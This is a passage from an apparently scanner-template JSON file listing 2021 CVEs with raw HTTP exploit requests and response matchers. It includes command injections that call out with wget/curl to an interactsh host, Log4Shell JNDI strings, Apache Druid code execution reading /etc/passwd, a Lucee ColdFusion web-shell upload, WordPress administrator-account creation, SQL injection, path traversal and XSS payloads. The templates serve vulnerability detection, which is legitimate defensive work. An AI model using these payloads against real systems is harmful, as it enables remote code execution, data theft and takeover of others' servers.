Execution","severity":"critical"},"requests":[{"raw":["POST /storfs-asup HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42551","info":{"name":"NetBiblio WebOPAC - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%27%2Balert%281%29%2B%27x","{{BaseURL}}/NetBiblio/search/shortview?searchField=W&searchType=Simple&searchTerm=x%5C%27%2Balert%281%29%2C%2F%2F"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SearchTerm: 'x'+alert(1)+'x',","SearchTerm: 'x\\\\'+alert(1),//',"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["NetBiblio"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-21975","info":{"name":"vRealize Operations Manager API - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /casa/nodes/thumbprints HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n[\"127.0.0.1:443/ui/\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vRealize Operations Manager","thumbprint","address"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-24165","info":{"name":"WordPress Ninja Forms <3.4.34 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","status_code_2 == 302","contains(header_2, 'Location: https://interact.sh?client_id=1')"],"condition":"and"}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42663","info":{"name":"Sourcecodester Online Event Booking and Reservation System 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname={{username}}&pwd={{password}}\n","GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</i><script>alert(document.domain)</script></div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41653","info":{"name":"TP-Link - OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi?2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6\ndataBlockSize=64\ntimeout=1\nnumberOfRepetitions=4\nhost=$(echo 127.0.0.1; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}')\nX_TP_ConnName=ewan_ipoe_d\ndiagnosticsState=Requested\n","POST /cgi?7 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain\nReferer: http://{{Hostname}}/mainFrame.htm\nCookie: Authorization=Basic YWRtaW46YWRtaW4=\n\n[ACT_OP_IPPING#0,0,0,0,0,0#0,0,0,0,0,0]0,0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-34640","info":{"name":"WordPress Securimage-WP-Fixed <=3.5.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET //wp-admin/options-general.php/\"></script><script>alert(document.domain)</script>/script%3E?page=securimage-wp-options%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31537","info":{"name":"SIS Informatik REWE GO SP17 <7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm({{randstr}})%3c%2fscript%3e&win=2707"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>confirm({{randstr}})</script>","SIS-REWE"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-21389","info":{"name":"BuddyPress REST API  <7.2.1 - Privilege Escalation/Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /wp-json/buddypress/v1/signup HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=UTF-8\n\n{\n  \"user_login\":\"{{randstr}}\",\n  \"password\":\"{{randstr}}\",\n  \"user_name\":\"{{randstr}}\",\n  \"user_email\":\"{{randstr}}@interact.sh\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["user_login","registered","activation_key","user_email"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21985","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"methodInput\":[{\"type\":\"ClusterComputeResource\",\"value\": null,\"serverGuid\": null}]}\n"],"matchers":[{"type":"word","part":"body","words":["{\"result\":{\"isDisconnected\":"]}]}]},{"id":"CVE-2021-27670","info":{"name":"Appspace 6.2.4 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44152","info":{"name":"Reprise License Manager 14.2 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/menu"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Administration Commands"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24435","info":{"name":"WordPress Titan Framework plugin <= 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27","{{BaseURL}}/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["(?i)(onerror=|onclick=)['\"]?alert\\(document\\.domain\\)['\"]?","<p>Grumpy wizards make"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25016","info":{"name":"Chaty < 2.8.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=chaty-contact-form-feed&search=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["search=</script><img src onerror=alert(document.domain)>","chaty_page_chaty"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-29441","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /nacos/v1/cs/configs?dataId=nacos.cfg.dataIdfoo&group=foo&content=helloWorld HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nUser-Agent: Nacos-Server\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 403","status_code_2 == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body_1, 'Forbidden')","body_2 == 'true'"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-34621","info":{"name":"WordPress ProfilePress  3.0.0-3.1.3 - Admin User Creation Weakness","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: multipart/form-data; boundary=---------------------------138742543134772812001999326589\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_username\"\n\n{{randstr}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_email\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_password_present\"\n\ntrue\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_first_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"reg_last_name\"\n\n{{randstr}}@interact.sh\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wp/?page_id=18\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"pp_current_url\"\n\n{{BaseURL}}\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"wp_capabilities[administrator]\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_form_id\"\n\n1\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"signup_referrer_page\"\n\n\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"action\"\n\npp_ajax_signup\n-----------------------------138742543134772812001999326589\nContent-Disposition: form-data; name=\"melange_id\"\n\n\n-----------------------------138742543134772812001999326589--\n","POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\nlog={{randstr}}@interact.sh&pwd={{randstr}}@interact.sh&wp-submit=Log+In\n","GET /wp-admin/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Welcome to your WordPress Dashboard"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21972","info":{"name":"VMware vSphere Client (HTML5) - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui/vropspluginui/rest/services/getstatus"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["VSPHERE-UI-JSESSIONID"],"condition":"and"},{"type":"regex","part":"body","regex":["(Install|Config) Final Progress"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind SQL Injection","severity":"high"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 15s\nGET /wp-admin/admin.php?page=wps_pages_page&ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&type=home HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"WP Statistics\")"],"condition":"and"},{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 500","contains(body_2, \">WordPress &rsaquo; Error<\") && contains(body_2, \">Your request is not valid.<\")"],"condition":"and"}]}]},{"id":"CVE-2021-43062","info":{"name":"Fortinet FortiMail 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com<Svg%2Fonload%3Dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<Svg/onload=alert(document.domain)>","FortiMail Click Protection"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-21800","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/ssh_form.php?hostname=%3C/title%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>SSH Session </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44529","info":{"name":"Ivanti EPM Cloud Services Appliance Code Injection","severity":"critical"},"requests":[{"raw":["GET /client/index.php HTTP/1.1\nHost: {{Hostname}}\nCookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["phpinfo()","Cloud Services Appliance"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35395","info":{"name":"RealTek Jungle SDK - Arbitrary Command Injection","severity":"critical"},"requests":[{"raw":["POST /goform/formWsc HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 